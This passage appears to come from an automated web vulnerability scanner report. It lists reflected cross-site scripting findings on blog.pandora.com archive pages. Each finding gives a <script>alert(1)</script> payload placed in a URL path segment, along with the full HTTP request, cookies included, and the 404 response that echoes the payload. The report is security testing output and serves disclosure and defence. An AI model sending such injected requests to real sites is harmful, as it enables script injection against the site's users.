Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:18 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives7b166<script>alert(1)</script>c595edeaf7d/2006/12/ was not found on this server.</p>
...[SNIP]...

3.87. http://blog.pandora.com/pandora/archives/2006/12/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/12/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4d7d6<script>alert(1)</script>9c1bb7f29d6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/20064d7d6<script>alert(1)</script>9c1bb7f29d6/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:21 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20064d7d6<script>alert(1)</script>9c1bb7f29d6/12/ was not found on this server.</p>
...[SNIP]...

3.88. http://blog.pandora.com/pandora/archives/2006/12/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/12/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 89734<script>alert(1)</script>10ad202e6f5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2006/1289734<script>alert(1)</script>10ad202e6f5/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:28 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006/1289734<script>alert(1)</script>10ad202e6f5/ was not found on this server.</p>
...[SNIP]...

3.89. http://blog.pandora.com/pandora/archives/2007/01/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/01/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 226ab<script>alert(1)</script>db94c5f4ab5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora226ab<script>alert(1)</script>db94c5f4ab5/archives/2007/01/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:07 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora226ab<script>alert(1)</script>db94c5f4ab5/archives/2007/01/ was not found on this server.</p>
...[SNIP]...

3.90. http://blog.pandora.com/pandora/archives/2007/01/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/01/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f7b27<script>alert(1)</script>e88437a6ff5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesf7b27<script>alert(1)</script>e88437a6ff5/2007/01/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:09 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesf7b27<script>alert(1)</script>e88437a6ff5/2007/01/ was not found on this server.</p>
...[SNIP]...

3.91. http://blog.pandora.com/pandora/archives/2007/01/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/01/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload fcf4c<script>alert(1)</script>158d11b266d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2007fcf4c<script>alert(1)</script>158d11b266d/01/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:11 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007fcf4c<script>alert(1)</script>158d11b266d/01/ was not found on this server.</p>
...[SNIP]...

3.92. http://blog.pandora.com/pandora/archives/2007/01/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/01/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a0649<script>alert(1)</script>9f0447f5c89 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2007/01a0649<script>alert(1)</script>9f0447f5c89/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:14 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007/01a0649<script>alert(1)</script>9f0447f5c89/ was not found on this server.</p>
...[SNIP]...

3.93. http://blog.pandora.com/pandora/archives/2007/02/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/02/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 39608<script>alert(1)</script>520f9e495aa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora39608<script>alert(1)</script>520f9e495aa/archives/2007/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:15 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora39608<script>alert(1)</script>520f9e495aa/archives/2007/02/ was not found on this server.</p>
...[SNIP]...

3.94. http://blog.pandora.com/pandora/archives/2007/02/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/02/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 94c6d<script>alert(1)</script>71c09bfa91f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives94c6d<script>alert(1)</script>71c09bfa91f/2007/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:17 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives94c6d<script>alert(1)</script>71c09bfa91f/2007/02/ was not found on this server.</p>
...[SNIP]...

3.95. http://blog.pandora.com/pandora/archives/2007/02/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/02/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 133b4<script>alert(1)</script>487daa5efe0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2007133b4<script>alert(1)</script>487daa5efe0/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:20 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007133b4<script>alert(1)</script>487daa5efe0/02/ was not found on this server.</p>
...[SNIP]...

3.96. http://blog.pandora.com/pandora/archives/2007/02/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/02/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b33a6<script>alert(1)</script>2c3a3b69a5c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2007/02b33a6<script>alert(1)</script>2c3a3b69a5c/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:23 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007/02b33a6<script>alert(1)</script>2c3a3b69a5c/ was not found on this server.</p>
...[SNIP]...

3.97. http://blog.pandora.com/pandora/archives/2007/03/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/03/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ac326<script>alert(1)</script>370b7b6a4ed was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandoraac326<script>alert(1)</script>370b7b6a4ed/archives/2007/03/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:07 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandoraac326<script>alert(1)</script>370b7b6a4ed/archives/2007/03/ was not found on this server.</p>
...[SNIP]...

3.98. http://blog.pandora.com/pandora/archives/2007/03/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/03/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 90b22<script>alert(1)</script>4fb98f6e6f6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives90b22<script>alert(1)</script>4fb98f6e6f6/2007/03/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:09 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives90b22<script>alert(1)</script>4fb98f6e6f6/2007/03/ was not found on this server.</p>
...[SNIP]...

3.99. http://blog.pandora.com/pandora/archives/2007/03/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/03/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 413a3<script>alert(1)</script>9a08076521d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2007413a3<script>alert(1)</script>9a08076521d/03/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:12 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007413a3<script>alert(1)</script>9a08076521d/03/ was not found on this server.</p>
...[SNIP]...

3.100. http://blog.pandora.com/pandora/archives/2007/03/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/03/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d17eb<script>alert(1)</script>62f82312779 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2007/03d17eb<script>alert(1)</script>62f82312779/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:15 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007/03d17eb<script>alert(1)</script>62f82312779/ was not found on this server.</p>
...[SNIP]...

3.101. http://blog.pandora.com/pandora/archives/2007/04/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/04/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2c059<script>alert(1)</script>cbdd421d4ad was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora2c059<script>alert(1)</script>cbdd421d4ad/archives/2007/04/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:17 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora2c059<script>alert(1)</script>cbdd421d4ad/archives/2007/04/ was not found on this server.</p>
...[SNIP]...

3.102. http://blog.pandora.com/pandora/archives/2007/04/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/04/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b3228<script>alert(1)</script>c5395df2fbd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesb3228<script>alert(1)</script>c5395df2fbd/2007/04/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:20 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesb3228<script>alert(1)</script>c5395df2fbd/2007/04/ was not found on this server.</p>
...[SNIP]...

3.103. http://blog.pandora.com/pandora/archives/2007/04/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/04/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a573a<script>alert(1)</script>1397d442dff was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2007a573a<script>alert(1)</script>1397d442dff/04/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
